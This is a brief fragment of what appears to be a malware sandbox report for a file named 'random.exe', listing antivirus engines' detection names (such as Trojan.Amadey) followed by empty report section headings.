BitDefenderTheta	Gen:NN.ZexaF.36810.3DWaaqWuEtoi
DeepInstinct	MALICIOUS
Malwarebytes	Trojan.Amadey
Zoner	Probably Heur.ExeHeaderL
Tencent	Trojan-DL.Win32.Deyma.kh
Fortinet	W32/Themida.HZB!tr
AVG	Win32:TrojanX-gen [Trj]
CrowdStrike	win/malicious_confidence_100% (D)

random.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All